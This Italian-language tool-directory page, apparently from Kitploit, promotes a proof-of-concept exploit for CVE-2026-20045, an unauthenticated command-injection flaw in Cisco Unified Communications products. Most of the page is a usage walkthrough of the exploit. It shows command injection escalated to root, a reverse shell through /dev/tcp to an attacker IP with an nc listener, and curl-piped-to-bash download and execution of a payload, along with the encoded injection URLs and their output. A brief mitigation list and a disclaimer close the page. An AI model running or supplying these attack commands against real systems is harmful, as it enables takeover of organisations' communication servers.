Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

Proof-of-concept exploit per CVE-2026-20045, una vulnerabilità critica di RCE non autenticata nei prodotti Cisco Unified Communications, che consente l'iniezione di comandi e una reverse shell con escalation a root.

Vedi Repository
637 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2026-20045 — Analisi della Zero-Day 🚨

Vulnerabilità 0-Day Cisco AsyncOS

🧨 Cos'è

Una vulnerabilità critica di esecuzione remota di codice (RCE) che colpisce diversi prodotti Cisco Unified Communications. È stata sfruttata attivamente in ambienti reali prima del rilascio delle patch.


🔥 Perché è pericolosa

  • 🚫 Nessuna autenticazione richiesta
  • 🖥️ Esecuzione remota di codice
  • 👑 Potenziale accesso a livello root
  • 🌍 Sfruttamento reale confermato

Ciò significa che un attaccante potrebbe assumere completamente il controllo dei sistemi interessati da remoto.


🚨 Esempi di utilizzo per CVE-2026-20045.py

Ecco una guida curata con esempi di utilizzo per eseguire lo script PoC, inclusa esattamente ciò che vedresti nel tuo terminale se lo sfruttamento riesce su un target Cisco Unified Communications vulnerabile (interfaccia web non patchata esposta). Ho aggiunto alcuni elementi estetici con emoji, blocchi di codice colorati (tramite markdown) e sezioni strutturate per una migliore leggibilità. 😎

1. Test di base delle informazioni di sistema

Questo esegue comandi semplici per recuperare ID utente, nome utente e dettagli di sistema.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

Cosa vedresti se funziona (Output riuscito):

root@kitploit:~
[*] Invio dell'iniezione Stage 1 a: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Comando iniziale: id && whoami && uname -a  
[+] Stage 1 probabilmente riuscito! Stato: 200  
[*] Invio dell'escalation Stage 2 a: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (escalation root) probabilmente riuscito! Stato: 200  

[+] Possibile output del comando:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 Segnali chiave: Indicatori verdi [+], stato HTTP 200 e risultati dei comandi nel blocco di output. Se non viene mostrato alcun output ma lo stato è 200, ha comunque funzionato silenziosamente!

2. Configurazione della reverse shell

Questo genera una shell interattiva verso la tua macchina. Per prima cosa, avvia un listener: nc -lvnp 4444.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

Cosa vedresti se funziona (Nel terminale dello script):

root@kitploit:~
[*] Invio dell'iniezione Stage 1 a: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Comando iniziale: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 probabilmente riuscito! Stato: 200  
[*] Invio dell'escalation Stage 2 a: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (escalation root) probabilmente riuscito! Stato: 200  
[+] Comando eseguito silenziosamente (controlla il target per gli effetti)  

Cosa vedresti nel terminale del listener (nc):

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 Segnali chiave: Lo script mostra messaggi di successo; il listener riceve immediatamente un prompt di shell root. Digita comandi lì per interagire!

3. Download ed esecuzione di file (es. payload personalizzato)

Questo scarica ed esegue uno script dal tuo server.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

Cosa vedresti se funziona (Output riuscito):

root@kitploit:~
[*] Invio dell'iniezione Stage 1 a: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Comando iniziale: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 probabilmente riuscito! Stato: 200  
[*] Invio dell'escalation Stage 2 a: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (escalation root) probabilmente riuscito! Stato: 200  
[+] Comando eseguito silenziosamente (controlla il target per gli effetti)  

📥 Segnali chiave: Codici di stato 200; verifica sul target (es. controlla log/file) o sul tuo server (log di download). Nessun output diretto se il payload è silenzioso.

💡 Suggerimenti professionali:

  • Esegui con sudo se necessario per i privilegi di rete.
  • Usa target HTTPS; lo script gestisce i certificati self-signed.
  • Se fallisce (es. 404/403), prova altri percorsi o controlla se il target è patchato.
  • Testa sempre in modo etico! 😈

🧩 Prodotti interessati

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 Causa principale

Validazione impropria dell'input fornito dall'utente nelle interfacce di gestione HTTP, che consente l'iniezione di comandi che porta all'esecuzione remota di codice.


📊 Gravità

  • Punteggio CVSS: 8.2 (Alto)
  • Impatto aziendale: Critico

🛡️ Mitigazione e difesa

  • ⚡ Applica immediatamente le patch Cisco
  • 🔒 Limita l'accesso alle interfacce di gestione
  • 🌐 Evita di esporre i sistemi direttamente a internet
  • 👀 Monitora i log per attività HTTP sospette
  • 🏛️ Segui le linee guida governative per la rimediation delle vulnerabilità se applicabile

🔒 Disclaimer:

Tutto il codice PoC è destinato esclusivamente a uso etico ed educativo su sistemi autorizzati. Lo sfruttamento non autorizzato è illegale; non si assume alcuna responsabilità per un uso improprio. 😈

Scarica lo strumento